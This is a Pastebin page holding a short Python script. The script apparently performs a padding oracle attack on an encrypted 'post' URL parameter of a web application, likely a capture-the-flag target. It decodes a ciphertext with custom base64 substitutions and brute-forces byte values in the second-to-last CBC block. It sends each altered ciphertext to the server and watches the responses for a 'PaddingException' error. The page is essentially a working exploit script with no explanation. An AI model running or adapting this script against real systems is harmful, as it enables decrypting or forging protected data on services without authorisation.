API tools faq
paste
Advertisement
Guest User

epb

a guest
Jan 26th, 2020
570
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.11 KB | None | 0 0
raw download clone embed print report
  1. #!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
  2.  
  3. import requests
  4. import base64
  5.  
  6. burp0_url = "http://34.74.105.127/0c09509317/"
  7. burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) "
  8. "Gecko/20100101 Firefox/72.0",
  9. "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
  10. "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
  11. "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://http://35.190.155.168",
  12. "Connection": "close", "Referer": "http://34.74.105.127/73294cf70f", "Upgrade-Insecure-Requests": "1"}
  13. burp0_data = {"title": "", "body": "kakarot"}
  14. encryptedResponse = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, allow_redirects=False)
  15. print(encryptedResponse.status_code)
  16. #b64_ct_repl = (encryptedResponse.headers["Location"].split('=')[1])
  17.  
  18. b64_ct_repl = "OUe0h0AiEEILFmpWIfBJlcQ97QiZ-ugj1eeqR1xp5ToM0okTekP-oTnUlxlHwbNiiNoMbpO-" \
  19. "FGxy0adyND6Gy67qzL325r4pic76O5JHrih9DhUwI4xBLjp4NhGYufF7w4Y4c!bD-LvinnI7c6W" \
  20. "EBhxqFIZ8i7F8csn1MciP2NEgbrWx8QOFmk4uMdEUrq0!7DKKBQgkSH9PEpFHUjbu-A~~"
  21.  
  22. print("Ciphertext encoded with b64: " + b64_ct_repl)
  23. b64_ct = b64_ct_repl.replace('~', '=').replace('!', '/').replace('-', '+')
  24. ct = base64.b64decode(b64_ct)
  25. ct_divided = ([ct[i:i+16] for i in range(0, len(ct), 16)])
  26. ct_numberOfBlocks = len(ct_divided)
  27.  
  28. print("Changing the second Last block to XOR that with Last decrypted "
  29. "block. Dont worry, decryption is handled by the server")
  30. blockToChange = ct_divided[ct_numberOfBlocks-2]
  31. for i in range(1, 254):
  32. if i != 1:
  33. guess = bytes(15) + bytes([i])
  34. padding = bytes(15) + bytes([1])
  35. encryptedBytes = [ bytes([a ^ b]) for (a,b) in zip(guess, padding) ]
  36. ct_divided[ct_numberOfBlocks-2] = b''.join(encryptedBytes)
  37. new_ct = b''.join(ct_divided)
  38. postContent = base64.b64encode(new_ct)
  39. postContent = postContent.decode('utf-8').replace('=', '~').replace('/', '!').replace('+', '-')
  40. burp1_url = "http://35.190.155.168/08165c13b1/?post=" + (postContent)
  41. pt_resp = requests.get(burp1_url, headers=burp0_headers)
  42. if "PaddingException" not in pt_resp.text:
  43. print("GET URL: " + burp1_url)
  44. print(str(len(postContent)))
  45. print(pt_resp.text)
  46. print("For offset: " + str(i))
  47.  
  48. if "multiple" in pt_resp.text:
  49. print(pt_resp.text)
  50. break
  51.  
  52. # burp1_url = "http://35.190.155.168:80/b7e6c184d5/?post=" + b64_ct_repl
  53. # burp1_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://35.227.24.107/474eb203e4/", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
  54. # pt_resp = requests.get(burp1_url, headers=burp1_headers)
  55.  
  56. # print(pt_resp.text)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!